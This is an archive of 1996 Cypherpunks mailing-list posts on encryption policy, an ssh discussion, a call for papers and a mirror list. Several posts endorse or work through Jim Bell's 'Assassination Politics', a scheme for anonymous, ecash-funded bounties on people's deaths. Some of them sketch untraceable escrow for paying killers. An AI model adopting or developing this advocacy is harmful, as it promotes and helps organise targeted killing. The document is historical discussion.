Unlike a few months ago, on the shameful day the Net cried "wolf" over these same provisions, mindlessly flooding congressional switchboards and any Email box within keyboard reach, despite the fact that the funding provisions had already been stripped from the anti-terrorism bill, there has been no hue-and-cry about these most recent moves.

Yes, some groups, such as the ACLU, EPIC and the Center for Democracy and Technology have been working the congressional back channels, buzzing around the frenzied legislators like crazed gnats.

But why haven't we heard about all this before now?
Why has this bill come down to the wire without the now expected flurry of "alerts" "bulletins" and other assorted red-flag waving by our esteemed Net guardians? Barr's had his ass hanging in the wind, fighting FBI Director Louis "Teflon" Freeh; he could have used some political cover from the cyberspace community. Yet, if he'd gone to that digital well, he'd have found only the echo of his own voice.

And while the efforts of Rep. Barr are encouraging, it's anything from a done deal. "As long as the door is cracked... there is room for mischief," said Barr's staffer. Meaning, until the bill is reported and voted on, some snapperhead congressman could fuck up the process yet again.

We all caught a bit of a reprieve here, but I wouldn't sleep well. This community still has a lot to learn about the Washington boneyard. Personally, I'm a little tired of getting beat up at every turn. Muscle up, folks, the fight doesn't get any easier.

Meeks out...

------------

Declan McCullagh contributed to this report.

From shabbir at vtw.org Thu Sep 26 23:39:00 1996
From: shabbir at vtw.org (Voters Telecommunications Watch)
Date: Fri, 27 Sep 1996 14:39:00 +0800
Subject: INFO: Netscape CEO Jim Barksdale signs the pro-crypto petition! (9/26/96)
Message-ID: <199609270416.AAA07147@panix3.panix.com>

=============================================================================
  ____                  _              _   _
 / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
| |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
| |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
 \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
            |___/|_|

    MORE NET LUMINARIES JOIN THOUSANDS IN SIGNING PRO-ENCRYPTION PETITION
                     http://www.crypto.com/petition/

                 JUDICIARY HEARING ON HR 3011 (9/25/96)

                        Date: September 25, 1996

         URL:http://www.crypto.com/       crypto-news at panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
    Introduction
    Join Netscape CEO Jim Barksdale as he signs the pro-crypto petition!
    How to receive crypto-news
    Press contacts

-----------------------------------------------------------------------------
INTRODUCTION

This is a busy last few days for Washington. In the midst of it all, the Judiciary committee held a hearing HR 3011, beginning the process of educating Congress for next year, and bringing in the Administration for a regular public drubbing about their antiquated encryption regulations.

The very same day, WWW.Crypto.Com was honored to have Netscape CEO Jim Barksdale sign onto petition that supports legislation that would:

    -Relax export controls on encryption technology;
    -Prohibit the government from imposing "Key Escrow" solutions domestically; and
    -Recognize the importance of privacy and security for the future of electronic commerce, individual liberty, and the success of the Internet.

Jim Barksdale is no stranger to the encryption debate. He testified at the July 25th hearing on the pro-encryption Pro-CODE bill (S1726). You can hear him in his own words by listening to the RealAudio transcript of the hearing cybercast at http://www.crypto.com/events/072596/

We'll be continuing the petition throughout the break and the election and use it next year to support the encryption legislation that will surely be introduced again.

Be a part of it by signing the petition with Jim Barksdale at http://www.crypto.com/petition/ !

-----------------------------------------------------------------------------
JOIN NETSCAPE CEO JIM BARKSDALE IN FIGHTING FOR YOUR PRIVACY!

The following petition can be signed onto at http://www.crypto.com/petition/

The Information Revolution is being held hostage by an outdated, Cold War-era U.S. encryption policy. Current U.S.
export controls and other initiatives are slowing the widespread availability of strong encryption products, endangering the privacy and security of electronic communications, harming the competitiveness of U.S. businesses, and threatening the future of electronic commerce and the growth of the Global Information Infrastructure (GII).

We the undersigned Internet users and concerned citizens strongly support Congressional efforts to address this critical issue. Bills are currently pending in both Houses of Congress which would:

    -Relax export controls on encryption technology;
    -Prohibit the government from imposing "Key Escrow" solutions domestically; and
    -Recognize the importance of privacy and security for the future of electronic commerce, individual liberty, and the success of the Internet.

We urge Congress to act NOW to enact a U.S. encryption policy that promotes electronic privacy and security.

Add your name to his at http://www.crypto.com/petition/ !

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com) or send mail to majordomo at panix.com with "subscribe crypto-news" in the body of the message. To unsubscribe, send a letter to majordomo at panix.com with "unsubscribe crypto-news" in the body.

-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
    Shabbir J.
    Safdar (VTW) at +1.718.596.2851 or shabbir at vtw.org
    Jonah Seiger (CDT) at +1.202.637.9800 or jseiger at cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================

From jf_avon at citenet.net Thu Sep 26 23:40:47 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Fri, 27 Sep 1996 14:40:47 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609270430.AA06876@cti02.citenet.net>

On 26 Sep 96 at 20:46, snow wrote:

> Having been a firefighter for about 4 years, I can say that for
>
> small fires water works quite a bit better. For larger fires (over a
> hundred acres or so) setting a backfire, or burning out the fuel in
> the direction the fire is probably going to go is a hell of a lot
> easier than hauling millions and millions of gallons or
> blood^h^h^h^h^h water.
>
> Petro, Christopher C.
> petro at suba.com
> snow at smoke.suba.com

Well, let's not debate over firefighting, a lousy analogy... As long as Canadair sells water bombers, let them do. It brings money to Montreal... :)

As for Jim Bell, he would probably say that he just proposes to use your techniques. :)

jfa

From jimbell at pacifier.com Thu Sep 26 23:49:06 1996
From: jimbell at pacifier.com (jim bell)
Date: Fri, 27 Sep 1996 14:49:06 +0800
Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <199609270426.VAA18253@mail.pacifier.com>

At 11:00 PM 9/25/96 -0700, Dale Thorn wrote:
>jim bell wrote:
>> That's about it. I long ago noticed the similarity between AP and the
>> fictional Gort.
>> Problem is, Gort would have to be programmed. How would you write such
>> a program? Governments would want their hand in it. They'd insist on
>> "government exceptions" to rules, like: "All violence is forbidden!
>> (except for violence by duly authorized government employees!)"
>> Not very practical.
>
>Indeed it may not be practical to try such a program on current
>computers. I've had thoughts for some time about an analogy where each
>person in a civilization represents a cell in a single brain, and so on,
>so perhaps AP is merely a portion of the program for this "brain". As
>to what happens when you try to concentrate a disproportionate amount of
>the programming task into a few hands, that appears to be the situation
>we have now.

Exactly correct. The current system is intended to present the illusion that it is the product of the voters, where it is really defined by the political establishment.

Bill Stewart pointed out (correctly) that what I'm proposing is "mechanism without a built-in policy." While this may appear to be a bit reckless, the reason I'm confident it will work is that the status quo has a _thoroughly_corrupt_ policy, a policy which is actively hostile to the interests and rights of the average citizen. Replacing that system with one that is merely neutral is a great improvement, particularly if there is no way for that policy to be hijacked by a tiny minority of the public.

Jim Bell
jimbell at pacifier.com

From jimbell at pacifier.com Fri Sep 27 00:01:53 1996
From: jimbell at pacifier.com (jim bell)
Date: Fri, 27 Sep 1996 15:01:53 +0800
Subject: AP Protocol Failures [NOISE]
Message-ID: <199609270426.VAA18243@mail.pacifier.com>

At 07:37 PM 9/26/96 -0500, snow wrote:
>> >> Troops are in Northern Ireland for a very simple and depressing
>> >> reason. People like Jim want to impose their will on others by force.
>> But AP is great - adding more violence to Ireland is just the thing
>> they need........
>
> It wouldn't ADD more violence.

I had intended to respond to Bill Stewart's comment before this. I was surprised that he would suggest that AP would (necessarily?) cause "more violence."
To me, it's obvious that it will cause _different_ violence, and I strongly suspect it'll actually reduce the total violence level, and certainly will do so in the long term.

But far more than reducing violence, it'll reduce coercion that doesn't rise to the level of violence as well. When people AREN'T put in jail or prison for a victimless crime, I consider that a drastic reduction in coercion, and that's progress. Put fewer people in jail, and you anger fewer people, and you rob fewer people by taxation to pay for that jail, etc.

>> One of the strong negatives of AP is that it leads to reverse AP -
>> if you don't know _which_ Hatfield killed the latest McCoy,
>> you might as well just shoot one or two Hatfield Boys at random.
>> If you kill off GrandDaddy Hatfield, there's nobody to say
>> "OK, let's stop shooting each other"; instead there's a bunch of
>> angry grandkids, and uncles, _all_ of whom have the
>> authority to say "Let's go kill the McCoy bastards who did this!"
>> The protocols may work when there's one hierarchical target -
>> they don't work with two. Hammurabi's law about "An eye for an eye
>> and a tooth for a tooth" was a _limitation_ on the amount of vengeance
>> you were allowed to take, not a minimum required vengeance.
>
> Putting AP into place doesn't make murder legal. You could still
>be arrested, tried (depending on the jurisdiction) and punished for it.

Not only that, you could use AP to kill somebody who killed SOMEBODY ELSE with AP! (which is, to me, a rather obvious fact, but one that escapes an unusually large number of people. 'course, you'd have to figure out who did it... a non-trivial task under the circumstances.)

Jim Bell
jimbell at pacifier.com

From ses at tipper.oit.unc.edu Fri Sep 27 00:03:26 1996
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Fri, 27 Sep 1996 15:03:26 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To:
Message-ID:

On Thu, 26 Sep 1996, Declan McCullagh wrote:

> Anonymity and nonescrowed crypto are the linchpins of AP and its more
> general case, Maysian crypto anarchy. The withering of the nation-state.

If I might dare a crypto-related comment as well; it also requires an absolutely trusted third-party to manage the funds and issue the ecash used to pay the murderer, (sorry, fortunate gambler). The reason why the third party must be trusted by both the payers and the gambler, and thus cannot be anonymous (only at 'best' pseudonymous) should be obvious.

From snow at smoke.suba.com Fri Sep 27 00:06:16 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 15:06:16 +0800
Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <9609240210.AA17228@vesuvius.ai.mit.edu>
Message-ID: <199609262349.SAA00297@smoke.suba.com>

Hallium said:
> Troops are in Northern Ireland for a very simple and depressing
> reason. People like Jim want to impose their will on others by force.
> Despite prolonged attempts by each faction to assassinate the leaders of
> the other they have been unsuccessful. If terrorists trained by Libya
> and Syria are unable to assassinate at will then we can be sure that Jim's
> band of kooks is not going to get any further.

That is your problem. You can't seem to get away from the thought that somebody is trying to rule. You assume that Mr. Bell wants to be President and Supreme Dictator of the World.

Remember your introduction to formal logic? It is A or NOT A, not A or B. NOT A _can_ be B, but it can also be anything BUT A.

What Mr. Bell wants, and I agree with is that NOT A. We don't want B, C, D, or any thing else, other than NOT A.

I remember this set of lines from an anarchist "newspaper" from the 80's:

Q: What are you going to replace the government with after you get rid of it?
A: Do you replace a cancer when you remove it?

We don't want to remove a leg, we want to cut out a cancer.
Consider AP extreme chemotherapy.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From jf_avon at citenet.net Fri Sep 27 00:18:08 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Fri, 27 Sep 1996 15:18:08 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609270422.AA06397@cti02.citenet.net>

On 26 Sep 96 at 16:51, Declan McCullagh wrote:

> Anonymity and nonescrowed crypto are the linchpins of AP and its
> more general case, Maysian crypto anarchy. The withering of the
> nation-state. Whatever you want to call it.
>
> To prevent it, governments will ban both. A criminal law, passed in
> the wake of say a bombing this fall in Washington, DC, banning
> nonescrowed crypto. (Freeh will assert he has evidence the
> terrorists used PGPhone.) And another law banning online anonymity.

I agree with the prediction but the cause will probably not be AP. AP could probably be run from BBS and direct link over a very informal and loose network made out of individual modem connections. I think it is very unlikely it would get successfully stopped. It could even be run from physically exchanged diskettes. It would run slowly, but still, it would run.

OTOH, the "Maysian" crypto anarchy will be a much more immediate problem to govts. "L'argent est le nerf de la guerre",or, loosely translated: "money is war's fuel" as we say...

When they start getting financially starved, they'll have to increase taxation but the population already have them in very low esteem...

AP, with a properly structured media campaign, will make govts heroes, Maysian anarchy will make them seen as looters.

Did I put my foot in my mouth again?

> What then, Mr. Bell?
>
> -Declan
> // declan at eff.org // I do not represent the EFF // declan at well.com

Jean-Francois Avon, Montreal QC Canada
DePompadour, Societe d'Importation Ltee
Finest Limoges porcelain and crystal
JFA Technologies, R&D consultant
physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From jf_avon at citenet.net Fri Sep 27 00:28:24 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Fri, 27 Sep 1996 15:28:24 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609270443.AA07590@cti02.citenet.net>

On 27 Sep 96 at 0:21, Simon Spero wrote:

> On Thu, 26 Sep 1996, Declan McCullagh wrote:
>
> > Anonymity and nonescrowed crypto are the linchpins of AP and its
> > more general case, Maysian crypto anarchy. The withering of the
> > nation-state.
>
> If I might dare a crypto-related comment as well; it also requires
> an absolutely trusted third-party to manage the funds and issue the
> ecash used to pay the murderer, (sorry, fortunate gambler). The
> reason why the third party must be trusted by both the payers and
> the gambler, and thus cannot be anonymous (only at 'best'
> pseudonymous) should be obvious.

For the payer, the amount involved is so small that he might think it is worth a shot to put the price of two bottles of beer "just in case" it works. As the system gets known, it'll gain reputation.

For the hitman, this is another story, but there is a way. AP, a sensationalistically chosen name (No, Jim, I know... you intended it only as a joke) very badly describes what the server does. It could accept donations for all sorts of things, many of them being legally unconsequential. So, a potential hitman group could make donations for anybody who would predict any kind of event and see if they would pay. The server could not even know if these would be integrity tests or legitimate donations.

IMO, there is only one way to prevent AP: it is by preventing the advent of e-cash. Making it illegal to issue such currency, and seize and prosecute heavily if any of it is found. This would include, of course, gold (or other material value) e-tokens, etc. It will come from a total control of money.

Can it be done? I doubt it very strongly.

jfa

Did you give away a copy of PGP to a friend today?
Please Cc me any reply, I am not on Cypherpunks anymore. Thanks.

From attila at primenet.com Fri Sep 27 00:53:29 1996
From: attila at primenet.com (attila)
Date: Fri, 27 Sep 1996 15:53:29 +0800
Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer?
In-Reply-To: <199609270017.RAA18940@dfw-ix7.ix.netcom.com>
Message-ID: <199609270540.XAA21446@InfoWest.COM>

In <199609270017.RAA18940 at dfw-ix7.ix.netcom.com>, on 09/26/96 at 05:17 PM, Bill Stewart said:

= .Tim May said, in a discussion on another topic
= . While BU is a lawyer, and I am not, I maintain
= . [........]
= .Is it correct to say that "Black Unicorn is a lawyer", or only that
= .the nym "Black Unicorn" is used by a person who's a lawyer under
= .another name? "Black Unicorn" at least doesn't appear to be a
= ._practicing lawyer_, though maybe [name used for legal work by
= .person who also uses nym "Black Unicorn"] is a practicing lawyer.
= .Tim's signature file no longer asserts that he's a Licensed
= .Ontologist, but this seems to be the kind of question you'd ask a
= .L.O. if you knew one.

we've gone around more than once on this topic in the past few years. tim either knows exactly who NU is, or has it narrowed to a very short list. Someone else actually met BU maybe a year ago.

there are other indications. BU claims association with a given location of which I am _very_ familiar. the crest belongs to a specific lineage, of which I have a direct connection to about 300 years ago.
BU has a past "life," I have a past "life," and the two are related --but you will not "hear" the "truth," calling it "fiction," anyway.

BU is a lawyer. and he has done a _great_ deal more with his degree than I, who refused to practice in the U.S.

Is BU currently a practicing lawyer? does it matter? BU is extremely well researched, and current. I suspect BU deals primarily with accounting, funding, and assets management, the details of which are irrelevant. If I needed a solid opinion, backed by existing law cites, and conflicting decisions, I would trust BU --and, I am plenty feisty, need I say more?

I do not have a "need to know" BU's "real name" any more than BU or anyone else needs to know mine. I think we could find each other with a few phone calls were it to be necessary, or one party asked....

Reality is what you make of it... and, if curiosity says the cat wishes to give up one life, ask tcm; I think he knows both names.

'nuff said?

From tcmay at got.net Fri Sep 27 01:14:40 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 27 Sep 1996 16:14:40 +0800
Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer?
In-Reply-To: <199609270017.RAA18940@dfw-ix7.ix.netcom.com>
Message-ID:

At 5:17 PM -0700 9/26/96, Bill Stewart wrote:

>Tim's signature file no longer asserts that he's a Licensed Ontologist,
>but this seems to be the kind of question you'd ask a L.O. if you knew one.
>

Yeah, I got some "What's an ontologist?" questions. One person I told to look it up in a dictionary. Then he came back with a "OK, so I looked it up. Why's a license needed?"

(I also got two responses asking why I was talking about cancer.)

--Tim

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From hallam at ai.mit.edu Fri Sep 27 01:21:31 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Fri, 27 Sep 1996 16:21:31 +0800
Subject: Weaknesses in Smart Cards? (Re: FLA_wed)
In-Reply-To: <52fcje$6ib@life.ai.mit.edu>
Message-ID: <324B6D5E.167E@ai.mit.edu>

It's worse than that. The Bellcore piece was presented as being about a possible weakness in MONDEX. In fact MONDEX does not use the cryptographic technique investigated. It's a symmetric key (DES) based system. I would imagine they would keep a symmetric component even if they go for a public key system.

BTW if you think carefully about MONDEX you will note that a public key system does not improve security. The system depends on private keys embedded in the devices. There is no value in having the devices use public key signatures over symmetric ones.

Phill

PS what's the betting that anyone at a high profile site who happens to be offline for a few hours to (say) change service providers will be reported as having been "hacked"?

From nobody at cypherpunks.ca Fri Sep 27 01:23:29 1996
From: nobody at cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 27 Sep 1996 16:23:29 +0800
Subject: ssh - How widely used?
In-Reply-To:
Message-ID: <199609270615.XAA15801@abraham.cs.berkeley.edu>

> Looks like a nice little implementation.
>
> Comments anyone?

Yup. Really nifty package that has been out (for unix) for about a year. Unfortunately, the author is turning it into a commercial product, so it may not be freely available in the future. There is now a Windows port, but it is entirely a commercial product. Source is not available.

Though ssh is on the whole a nifty product, the unix version contained a number of nasty implementation bugs that opened large security holes. These were found because source code was made available. I wouldn't trust the Windows version. It seems inevitable that there will be some bugs in it, but unlike the Unix version, "good guys" are a lot less likely to find and report them.

From chad at lycos.com Fri Sep 27 01:35:10 1996
From: chad at lycos.com (Chad Dougherty)
Date: Fri, 27 Sep 1996 16:35:10 +0800
Subject: ssh - How widely used?
In-Reply-To:
Message-ID: <199609270608.CAA24129@rat.eng.lycos.com>

-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:
> Theres a windows version, mac is under vauge development. SSH
> is pretty cool, but the code base is somewhat messy, and its shows
> signs of its origins in things like systems calls not having their
> return values checked.
>
> Despite all this, I use it, like it, and recomend it for use
> in systems not likely to come under attack by professionals.
>
> Adam
>

Why do you say "not likely to come under attack by professionals"? Have you found security holes in it?

-Chad

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMktvVTa/vRyBMxWdAQGRsAP+PbjVCYB0FrNTY6CUCH/D5BZ02gczvMzQ
1kdlf7Lcx+GcyAosaJXgovJpA/UcIq/ShIELtuvZQNqB3JVLCL3RvYbQ0vf5o6wI
QEnL5gS8uEetr2C7U/Pt2lqkwv0PTQYv/O7uKjVFAd36p0aRrbQJOkX6LpKNbbYi
oDk5B9XgbK4=
=4aWj
-----END PGP SIGNATURE-----

From alano at teleport.com Fri Sep 27 01:57:57 1996
From: alano at teleport.com (Alan Olsen)
Date: Fri, 27 Sep 1996 16:57:57 +0800
Subject: Tamper-Resistant Software from INTEL
Message-ID: <3.0b16.32.19960926211900.00b94b20@mail.teleport.com>

At 07:57 PM 9/26/96 -0500, snow wrote:
>Mr. Guthery
>> Has anybody heard of tamper-resistant software in general or a method
>> for tamper-resistant software from Intel in particular?
>
> What do you mean by "tamper resistant"?

It means that if you do *ANYTHING* to try and adjust, modify, and/or configure the software, it no longer functions.

Sadly, Microsoft has beat them to the punch on this technology.

---
| "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: |
| mankind free in one-key-steganography-privacy!" | Ignore the man |
|`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.|
| http://www.teleport.com/~alano/ | alano at teleport.com |

From remailer at cypherpunks.ca Fri Sep 27 01:58:25 1996
From: remailer at cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 27 Sep 1996 16:58:25 +0800
Subject: Newsgroup proposal: misc.anonymous
In-Reply-To:
Message-ID: <199609270522.WAA14373@abraham.cs.berkeley.edu>

"Mark M." writes:

> In an effort to get anonymity and message pools more widespread, I think it
> would be a good idea to establish a newsgroup for anonymous message pools that
> would get the same distribution as any other newsgroup in the "big 8". The
> "misc" hierarchy is probably the best place for such a newsgroup since it
> already carries groups like "misc.misc" and "misc.test". Does anyone have any
> suggestions or objections?

This sounds like a good idea. I would certainly vote for such a news group. Should the name be misc.anonymous or misc.anonymous.messages? Are alt.anonymous and alt.anonymous.messages basically two different newsgroups for exactly the same purpose, or is there some difference between them.

From andrew_loewenstern at il.us.swissbank.com Fri Sep 27 01:58:59 1996
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Fri, 27 Sep 1996 16:58:59 +0800
Subject: WARNING: This Message Actually Contains a Question ReguardingCrypto!
In-Reply-To: <199609241649.LAA22238@mailhub.amaranth.com>
Message-ID: <9609252059.AA00824@ch1d157nwk>

> I just recently downloaded copies of Blowfish & Ghost.
>
> Does anyone have any experience with these two algorithms?

Don't use GOST unless you think you can come up with some good S-boxes. It's pretty much only out there for educational purposes.

andrew

From tcmay at got.net Fri Sep 27 02:04:57 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 27 Sep 1996 17:04:57 +0800
Subject: Escrow Services
In-Reply-To:
Message-ID:

At 12:21 AM -0400 9/27/96, Simon Spero wrote:
>On Thu, 26 Sep 1996, Declan McCullagh wrote:
>
>> Anonymity and nonescrowed crypto are the linchpins of AP and its more
>> general case, Maysian crypto anarchy. The withering of the nation-state.
>
>If I might dare a crypto-related comment as well; it also requires an
>absolutely trusted third-party to manage the funds and issue the ecash
>used to pay the murderer, (sorry, fortunate gambler). The reason why the
>third party must be trusted by both the payers and the gambler, and thus
>cannot be anonymous (only at 'best' pseudonymous) should be obvious.

Do you consider an entity such as "Joe's Escrow--You Slay, We Pay" with an untraceable BlackNet identity to be "anonymous" or "pseudonymous"? I'd say it can be made "untraceable," but with a persistent name and reputation.

How does an escrow service (and I mean the classical definition of escrow, not the newspeak definition used by the U.S. government) survive and prosper? By being in the business of releasing funds when conditions are met, and not otherwise. By not absconding with the funds.

Note that in the real world, escrow services do quite well, because the continuing future revenue stream from their good reputation exceeds what they could get by "burning" any particular customer. (Sometimes by putting up a bond, which is a kind of secondary escrow. Also, escrow services can be "pinged" (tested) by lots of small transactions. (A lot of similarities between digital escrow services and digital banks.)

(For more on this--a lot more--see the "escrow" entries in my Cyphernomicon.)
--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From dthorn at gte.net Fri Sep 27 04:04:12 1996
From: dthorn at gte.net (Dale Thorn)
Date: Fri, 27 Sep 1996 19:04:12 +0800
Subject: Public Schools
In-Reply-To: <199609270229.TAA03286@dns2.noc.best.net>
Message-ID: <324B9008.17A4@gte.net>

James A. Donald wrote:
> Phil Fraering writes:
> >> > Without vouchers, you don't say anything about the intelligence
> >> > of
> >> > your test subjects; to a _very_ large degree, intelligence isn't
> >> > genetic. Or
> Bag of shit wrote:
> >> That's the political correct thing to say, but do you have any
> >> scientific evidence to support this claim?
> At 11:19 PM 9/25/96 -0700, Dale Thorn wrote:
> > People have argued for genetic disposition to certain things, and I
> > think they are sometimes (most times?) confused [...]
> [Lots of meaningless hand waving hot air deleted]
>
> The key basic test of the power of genes is studies of identical
> twins raised in different families.
> They have near identical IQ's, and a wide range of
> very similar behavior.
> Identical twins raised in different families are more
> similar than identical twins raised in the same family,
> probably because of deliberate attempts to differentiate
> themselves.
> Except in the case of extreme environmental pressures --
> starvation, neglect, and the like, genes count for
> just about everything, and environment for almost
> nothing.
Please excuse my bluntness, but you obviously get your info out of a book, whereas I get mine from actual experience, which I can demonstrate quite well.

Your identical twins example means nothing, as it's totally likely that: 1) Few identical twins separated early are really available for study and 2) Far fewer yet would have a substantially different environment awaiting them. This is one test you'd certainly have to do purposely (separating them, that is).

Your testimonial of IQ's is equally dubious, excepting you should come up with a test that measures actual intelligence. The "wide range of similar behavior" puts the torch to your argument. If you want to argue that the twins would grow nearly always to the same height, I could allow that (but still argue the point), but behavior? Please!

From enzo at ima.com Fri Sep 27 04:24:41 1996
From: enzo at ima.com (Enzo Michelangeli)
Date: Fri, 27 Sep 1996 19:24:41 +0800
Subject: Call for Papers
Message-ID:

FYI...

---------- Forwarded message ----------
Date: Tue, 24 Sep 96 09:49:03 EDT
From: Nick Maxemchuk
To: apc at ee.nthu.edu.tw, apc_members at hornbill.ee.nus.sg, commsoft at cc.bellcore.com, enternet at bbn.com, ietf at CNRI.Reston.VA.US, itc at fokus.gmd.de, multicomm at cc.bellcore.com, tccc at cs.umass.edu
Subject: Call for Papers

CALL FOR PAPERS

IEEE Journal on Selected Areas in Communications

COPYRIGHT AND PRIVACY PROTECTION

Significant investments are now being made worldwide to develop an infrastructure for on-line services and electronic commerce. A major impediment is the lack of effective protection of copyright for content owners and of privacy for users. Digital data can be easily copied and redistributed widely without any loss of fidelity. One promising idea is to discourage illicit distribution by watermarking digital objects with hidden copyright messages to proclaim ownership and unique identifiers to help trace pirates.
The techniques of information hiding are in many ways related to mechanisms that can be used to protect the anonymity of system users by concealing address, location and routing information. The problem becomes even more interesting when privacy protection and copyright protection must be combined in the same system.

We seek fundamental papers on watermarking of digital data, on techniques for anonymous communications, and design and analysis of systems that protect copyright and/or privacy. A partial list of topics is as follows:

+ watermarking of digital data
+ anonymous communications
+ steganography
+ covert and subliminal channels in networks protocols
+ combining copyright and privacy protection
+ experiments and attacks
+ tradeoffs between performance and security

Prospective authors should email their manuscripts (PostScript format only) or send six hard copies to one of the Guest Editors listed below, according to the following schedule. Please direct all email enquiries to slow at ee.mu.oz.au.

Manuscript Due: March 1, 1997
Acceptance Notification: August 1, 1997
Final Manuscript Due: November 1, 1997
Publication Date: 2nd Quarter 1998

Ross Anderson                           Ingemar Cox
Cambridge University Computer Lab       NEC Research
Pembroke Street                         4 Independence Way
Cambridge CB2 3QG, U.K.                 Princeton NJ 08540, USA
Tel: +44 1223 33 47 33                  Tel: +1 609 951 2722
Fax: +44 1223 33 46 78                  Fax: +1 609 951 2482
Email: ross.anderson at cl.cam.ac.uk     Email: ingemar at research.nj.nec.com

Steven Low                              Nicholas Maxemchuk
Dept. of Electrical Electronic Engr.    ATT Laboratories
University of Melbourne                 600 Mountain Ave.
Parkville, Vic 3052, Australia          Murray Hill NJ 07974, USA
Tel: +6 13 9287 9205                    Tel: +1 908 582 6240
Fax: +6 13 9287 9188                    Fax: +1 908 582 5807
Email: slow at ee.mu.oz.au               Email: nfm at research.att.com

From geeman at best.com Fri Sep 27 04:44:05 1996
From: geeman at best.com (geeman)
Date: Fri, 27 Sep 1996 19:44:05 +0800
Subject: Tamper-Resistant Software from INTEL
In-Reply-To: <3.0b16.32.19960926211900.00b94b20@mail.teleport.com>
Message-ID: <324BA226.8E1@best.com>

>
> It means that if you do *ANYTHING* to try and adjust, modify, and/or
> configure the software, it no longer functions. Sadly, Microsoft has beat
> them to the punch on this technology.
>
>

As far as I know, it has raised the bar, so to speak, but that's all. It may have raised it pretty far, but as we know there's nothing you can't do on untrustable hardware. Which Microsoftware are you referring to, BTW?

gee. man.

From M.T.Hamilton at lboro.ac.uk Fri Sep 27 05:01:38 1996
From: M.T.Hamilton at lboro.ac.uk (martin hamilton)
Date: Fri, 27 Sep 1996 20:01:38 +0800
Subject: ssh - How widely used?
In-Reply-To: <199609270039.TAA05797@homeport.org>
Message-ID:

On Thu, 26 Sep 1996, Adam Shostack wrote:

> There's a windows version, mac is under vague development. SSH
> is pretty cool, but the code base is somewhat messy, and it shows
> signs of its origins in things like systems calls not having their
> return values checked.

Shame it costs $$$, though I appreciate that Tatu needs to eat... ;-)

Perhaps Cedomir Igaly could be persuaded to release the source code to the Windows port he did ? Anyone else interested in getting a little group together to hack on this ?
(under GPL or BSD style copyright)

Martin

From tank at xs4all.nl Fri Sep 27 06:29:04 1996
From: tank at xs4all.nl (tank)
Date: Fri, 27 Sep 1996 21:29:04 +0800
Subject: radikal-mirror list as of 27-9-1996
Message-ID: <199609271027.MAA09630@xs1.xs4all.nl>

Receive Radikal 154 by email: Send an empty message to radikal at xs4all.nl and you receive issue 154 by mail.

http:
http://www.xs4all.nl/~bslash/radikal/radikal.tar.gz Radikal-site unix
http://www.xs4all.nl/~bslash/radikal/radi.zip Radikal-site dos-zip

ftp:
ftp://utopia.hacktic.nl/pub/replay/pub/incoming Radikal 154 in plaintext ASCII
http://www.xs4all.nl/~radikal/radi154.tgz Radikal 154 unix archive
http://www.xs4all.nl/~radikal/radi154.zip Radikal 154 dos-zip archive

If you got your mirror up and running let us know

Special mirror:
de.soc.zensur
de.org.politik.spd

Radikal-sites:
1.BACK ONLINE http://www.xs4all.nl/~radikal
2.BACK ONLINE http://www.xs4all.nl/~tank/radikal
3.http://huizen.dds.nl/~tank/radikal
4.http://burn.ucsd.edu/%7Eats/RADIKAL/
5.http://www.jca.or.jp/~taratta/mirror/radikal/
6.http://www.serve.com/~spg/
7.http://huizen.dds.nl/~radikal
8.http://www.canucksoup.net/radikal/index.html
9.http://www.ecn.org/radikal
